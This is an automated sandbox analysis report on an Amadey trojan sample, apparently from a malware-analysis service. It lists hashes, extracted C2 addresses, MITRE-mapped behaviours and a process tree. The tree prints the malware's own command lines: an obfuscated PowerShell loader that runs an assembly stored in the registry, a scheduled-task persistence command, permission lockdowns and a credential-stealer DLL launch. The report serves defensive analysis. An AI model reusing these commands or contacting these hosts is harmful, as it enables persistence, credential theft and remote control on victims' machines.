amadey | 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

Analysis

max time kernel
234s
max time network
291s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
13-12-2022 22:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
Size

5.5MB
MD5

dcded7ac014d98160a90789c615ae3cf
SHA1

e1f14ffa121e6618aaa5760c91d129503f7656da
SHA256

7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995
SHA512

fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c
SSDEEP

98304:IrxJwipiyZZ9RmdEeGCbGAstmlUse5mvKLgO/zhyPSp8616v+E7LF9yzTuU:INZpimLRvCbVlLnSg6piW+T4

Score

10^/10

amadey systembc bootkit collection evasion persistence spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

3.60

85.209.135.11/gjend7w/index.php

Extracted

Family

systembc

89.22.236.225:4193

176.124.205.5:4193

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs

Processes:

Emit64.exepowershell.EXE

description	pid	process	target process
PID 268 created 1192	268	Emit64.exe	Explorer.EXE
PID 268 created 1192	268	Emit64.exe	Explorer.EXE
PID 268 created 1192	268	Emit64.exe	Explorer.EXE
PID 268 created 1192	268	Emit64.exe	Explorer.EXE
PID 268 created 1192	268	Emit64.exe	Explorer.EXE
PID 268 created 1192	268	Emit64.exe	Explorer.EXE
PID 268 created 1192	268	Emit64.exe	Explorer.EXE
PID 872 created 420	872	powershell.EXE	winlogon.exe

SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

rundll32.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rundll32.exe
Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exerundll32.exe

flow pid process

6 1204 rundll32.exe
7 1212 rundll32.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

Emit64.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts Emit64.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rundll32.exe

flow	pid	process
6	1204	rundll32.exe
7	1212	rundll32.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	Emit64.exe

Executes dropped EXE 11 IoCs

Processes:

gntuud.exegntuud.exeumciavi32.exegntuud.exeEmit64.exeavicapn32.exegntuud.exegntuud.exegntuud.exegntuud.exenvdrivesllapi64.exe

pid	process
436	gntuud.exe
472	gntuud.exe
1564	umciavi32.exe
368	gntuud.exe
268	Emit64.exe
1160	avicapn32.exe
1384	gntuud.exe
1216	gntuud.exe
1716	gntuud.exe
984	gntuud.exe
1496	nvdrivesllapi64.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rundll32.exe

Loads dropped DLL 21 IoCs

Processes:

7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exegntuud.exerundll32.exerundll32.exegntuud.exegntuud.exerundll32.exegntuud.exetaskeng.exe

pid	process
960	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
436	gntuud.exe
548	rundll32.exe
548	rundll32.exe
548	rundll32.exe
548	rundll32.exe
1204	rundll32.exe
1204	rundll32.exe
1204	rundll32.exe
1204	rundll32.exe
472	gntuud.exe
472	gntuud.exe
472	gntuud.exe
472	gntuud.exe
368	gntuud.exe
1212	rundll32.exe
1212	rundll32.exe
1212	rundll32.exe
1212	rundll32.exe
1216	gntuud.exe
964	taskeng.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

rundll32.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	rundll32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

gntuud.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows\CurrentVersion\Run\syncfiles.dll = "rundll32 C:\\Users\\Admin\\1000003062\\syncfiles.dll, rundll"	gntuud.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows\CurrentVersion\Run\umciavi32.exe = "C:\\Users\\Admin\\AppData\\Roaming\\1000006050\\umciavi32.exe"	gntuud.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

rundll32.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rundll32.exe
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

rundll32.exe

description ioc process

File opened for modification \??\PhysicalDrive0 rundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	rundll32.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	rundll32.exe

Drops file in System32 directory 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs

Processes:

7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exegntuud.exerundll32.exegntuud.exeEmit64.exeavicapn32.exerundll32.exegntuud.exegntuud.exenvdrivesllapi64.exe

pid	process
1724	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
1724	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
436	gntuud.exe
436	gntuud.exe
1204	rundll32.exe
368	gntuud.exe
368	gntuud.exe
268	Emit64.exe
268	Emit64.exe
1160	avicapn32.exe
1160	avicapn32.exe
1212	rundll32.exe
1212	rundll32.exe
1216	gntuud.exe
1216	gntuud.exe
984	gntuud.exe
984	gntuud.exe
1496	nvdrivesllapi64.exe
1496	nvdrivesllapi64.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exegntuud.exegntuud.exegntuud.exeEmit64.exepowershell.EXE

description	pid	process	target process
PID 1724 set thread context of 960	1724	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
PID 436 set thread context of 472	436	gntuud.exe	gntuud.exe
PID 368 set thread context of 1384	368	gntuud.exe	gntuud.exe
PID 1216 set thread context of 1716	1216	gntuud.exe	gntuud.exe
PID 268 set thread context of 1020	268	Emit64.exe	dialer.exe
PID 872 set thread context of 1388	872	powershell.EXE	dllhost.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

844 sc.exe
840 sc.exe
1036 sc.exe
1504 sc.exe
1632 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1960 schtasks.exe
836 schtasks.exe

pid	process
844	sc.exe
840	sc.exe
1036	sc.exe
1504	sc.exe
1632	sc.exe

pid	process
1960	schtasks.exe
836	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 3077d7bd4c0fd901	powershell.EXE

Suspicious behavior: EnumeratesProcesses 41 IoCs

Processes:

7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exegntuud.exeumciavi32.exeEmit64.exeavicapn32.exegntuud.exerundll32.exegntuud.exepowershell.exepowershell.exepowershell.exepowershell.EXEnvdrivesllapi64.exegntuud.exedllhost.exe

pid	process
1724	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
436	gntuud.exe
1564	umciavi32.exe
268	Emit64.exe
1160	avicapn32.exe
368	gntuud.exe
1212	rundll32.exe
1212	rundll32.exe
1212	rundll32.exe
1212	rundll32.exe
1212	rundll32.exe
1212	rundll32.exe
1216	gntuud.exe
1564	umciavi32.exe
1564	umciavi32.exe
1564	umciavi32.exe
268	Emit64.exe
268	Emit64.exe
268	Emit64.exe
268	Emit64.exe
268	Emit64.exe
268	Emit64.exe
268	Emit64.exe
268	Emit64.exe
1524	powershell.exe
1752	powershell.exe
268	Emit64.exe
268	Emit64.exe
268	Emit64.exe
268	Emit64.exe
268	Emit64.exe
268	Emit64.exe
904	powershell.exe
872	powershell.EXE
1496	nvdrivesllapi64.exe
984	gntuud.exe
872	powershell.EXE
1388	dllhost.exe
1388	dllhost.exe
1388	dllhost.exe
1388	dllhost.exe

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exegntuud.exegntuud.exegntuud.exe

pid process

1724 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
436 gntuud.exe
368 gntuud.exe
1216 gntuud.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exesvchost.exe

description	pid	process
Token: SeShutdownPrivilege	832	powercfg.exe
Token: SeShutdownPrivilege	812	powercfg.exe
Token: SeShutdownPrivilege	1996	powercfg.exe
Token: SeShutdownPrivilege	1300	powercfg.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	904	powershell.exe
Token: SeDebugPrivilege	872	powershell.EXE
Token: SeDebugPrivilege	872	powershell.EXE
Token: SeDebugPrivilege	1388	dllhost.exe
Token: SeAuditPrivilege	884	svchost.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exegntuud.exegntuud.exegntuud.exe

pid process

1724 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
436 gntuud.exe
368 gntuud.exe
1216 gntuud.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exegntuud.exegntuud.execmd.exerundll32.exe

description	pid	process	target process
PID 1724 wrote to memory of 960	1724	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
PID 1724 wrote to memory of 960	1724	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
PID 1724 wrote to memory of 960	1724	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
PID 1724 wrote to memory of 960	1724	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
PID 1724 wrote to memory of 960	1724	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
PID 1724 wrote to memory of 960	1724	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
PID 1724 wrote to memory of 960	1724	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
PID 1724 wrote to memory of 960	1724	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
PID 960 wrote to memory of 436	960	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe	gntuud.exe
PID 960 wrote to memory of 436	960	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe	gntuud.exe
PID 960 wrote to memory of 436	960	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe	gntuud.exe
PID 960 wrote to memory of 436	960	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe	gntuud.exe
PID 960 wrote to memory of 436	960	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe	gntuud.exe
PID 960 wrote to memory of 436	960	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe	gntuud.exe
PID 960 wrote to memory of 436	960	7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe	gntuud.exe
PID 436 wrote to memory of 472	436	gntuud.exe	gntuud.exe
PID 436 wrote to memory of 472	436	gntuud.exe	gntuud.exe
PID 436 wrote to memory of 472	436	gntuud.exe	gntuud.exe
PID 436 wrote to memory of 472	436	gntuud.exe	gntuud.exe
PID 436 wrote to memory of 472	436	gntuud.exe	gntuud.exe
PID 436 wrote to memory of 472	436	gntuud.exe	gntuud.exe
PID 436 wrote to memory of 472	436	gntuud.exe	gntuud.exe
PID 436 wrote to memory of 472	436	gntuud.exe	gntuud.exe
PID 472 wrote to memory of 1960	472	gntuud.exe	schtasks.exe
PID 472 wrote to memory of 1960	472	gntuud.exe	schtasks.exe
PID 472 wrote to memory of 1960	472	gntuud.exe	schtasks.exe
PID 472 wrote to memory of 1960	472	gntuud.exe	schtasks.exe
PID 472 wrote to memory of 840	472	gntuud.exe	cmd.exe
PID 472 wrote to memory of 840	472	gntuud.exe	cmd.exe
PID 472 wrote to memory of 840	472	gntuud.exe	cmd.exe
PID 472 wrote to memory of 840	472	gntuud.exe	cmd.exe
PID 840 wrote to memory of 1280	840	cmd.exe	cmd.exe
PID 840 wrote to memory of 1280	840	cmd.exe	cmd.exe
PID 840 wrote to memory of 1280	840	cmd.exe	cmd.exe
PID 840 wrote to memory of 1280	840	cmd.exe	cmd.exe
PID 840 wrote to memory of 2008	840	cmd.exe	cacls.exe
PID 840 wrote to memory of 2008	840	cmd.exe	cacls.exe
PID 840 wrote to memory of 2008	840	cmd.exe	cacls.exe
PID 840 wrote to memory of 2008	840	cmd.exe	cacls.exe
PID 840 wrote to memory of 1540	840	cmd.exe	cacls.exe
PID 840 wrote to memory of 1540	840	cmd.exe	cacls.exe
PID 840 wrote to memory of 1540	840	cmd.exe	cacls.exe
PID 840 wrote to memory of 1540	840	cmd.exe	cacls.exe
PID 840 wrote to memory of 316	840	cmd.exe	cmd.exe
PID 840 wrote to memory of 316	840	cmd.exe	cmd.exe
PID 840 wrote to memory of 316	840	cmd.exe	cmd.exe
PID 840 wrote to memory of 316	840	cmd.exe	cmd.exe
PID 840 wrote to memory of 1572	840	cmd.exe	cacls.exe
PID 840 wrote to memory of 1572	840	cmd.exe	cacls.exe
PID 840 wrote to memory of 1572	840	cmd.exe	cacls.exe
PID 840 wrote to memory of 1572	840	cmd.exe	cacls.exe
PID 840 wrote to memory of 1464	840	cmd.exe	cacls.exe
PID 840 wrote to memory of 1464	840	cmd.exe	cacls.exe
PID 840 wrote to memory of 1464	840	cmd.exe	cacls.exe
PID 840 wrote to memory of 1464	840	cmd.exe	cacls.exe
PID 472 wrote to memory of 548	472	gntuud.exe	rundll32.exe
PID 472 wrote to memory of 548	472	gntuud.exe	rundll32.exe
PID 472 wrote to memory of 548	472	gntuud.exe	rundll32.exe
PID 472 wrote to memory of 548	472	gntuud.exe	rundll32.exe
PID 472 wrote to memory of 548	472	gntuud.exe	rundll32.exe
PID 472 wrote to memory of 548	472	gntuud.exe	rundll32.exe
PID 472 wrote to memory of 548	472	gntuud.exe	rundll32.exe
PID 548 wrote to memory of 1204	548	rundll32.exe	rundll32.exe
PID 548 wrote to memory of 1204	548	rundll32.exe	rundll32.exe

outlook_win_path 1 IoCs

Processes:

rundll32.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	rundll32.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:480

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:1676

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1088

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:1028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:884

C:\Windows\system32\taskeng.exe
taskeng.exe {11DF78F0-8EBB-41ED-91BB-DEED8EE51B17} S-1-5-21-1214520366-621468234-4062160515-1000:VDWSWJJD\Admin:Interactive:[1]
3⤵
- Loads dropped DLL
PID:964

C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:368

C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
"C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"
5⤵
- Executes dropped EXE
PID:1384

C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1216

C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
"C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"
5⤵
- Executes dropped EXE
PID:1716

C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:984

C:\Users\Admin\Locktime\nvdrivesllapi64.exe
C:\Users\Admin\Locktime\nvdrivesllapi64.exe
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1496

C:\Windows\system32\taskeng.exe
taskeng.exe {BBEED8D4-F26A-424A-8853-6617C4198847} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
PID:1300

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
4⤵
- Drops file in System32 directory
PID:852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+'E'+'').GetValue('di'+[Char](97)+''+'l'+''+'e'+''+[Char](114)+''+'s'+''+'t'+'ag'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:860

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:604

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
3⤵
PID:1528

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{963920dd-c369-4e0e-afab-81d96a6012bc}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1388

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1192

C:\Users\Admin\AppData\Local\Temp\7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
"C:\Users\Admin\AppData\Local\Temp\7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe"
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1724

C:\Users\Admin\AppData\Local\Temp\7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
"C:\Users\Admin\AppData\Local\Temp\7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe"
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:960

C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
"C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:436

C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
"C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:472

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe" /F
6⤵
- Creates scheduled task(s)
PID:1960

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "Admin:N"&&CACLS "gntuud.exe" /P "Admin:R" /E&&echo Y|CACLS "..\acc0b83959" /P "Admin:N"&&CACLS "..\acc0b83959" /P "Admin:R" /E&&Exit
6⤵
- Suspicious use of WriteProcessMemory
PID:840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7⤵
PID:1280

C:\Windows\SysWOW64\cacls.exe
CACLS "gntuud.exe" /P "Admin:N"
7⤵
PID:2008

C:\Windows\SysWOW64\cacls.exe
CACLS "gntuud.exe" /P "Admin:R" /E
7⤵
PID:1540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7⤵
PID:316

C:\Windows\SysWOW64\cacls.exe
CACLS "..\acc0b83959" /P "Admin:N"
7⤵
PID:1572

C:\Windows\SysWOW64\cacls.exe
CACLS "..\acc0b83959" /P "Admin:R" /E
7⤵
PID:1464

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\1000003062\syncfiles.dll, rundll
6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:548

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\1000003062\syncfiles.dll, rundll
7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1204

C:\Users\Admin\AppData\Roaming\1000006050\umciavi32.exe
"C:\Users\Admin\AppData\Roaming\1000006050\umciavi32.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1564

C:\Users\Admin\AppData\Local\Temp\1000008001\Emit64.exe
"C:\Users\Admin\AppData\Local\Temp\1000008001\Emit64.exe"
6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:268

C:\Users\Admin\AppData\Local\Temp\1000009001\avicapn32.exe
"C:\Users\Admin\AppData\Local\Temp\1000009001\avicapn32.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1160

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main
6⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- outlook_win_path
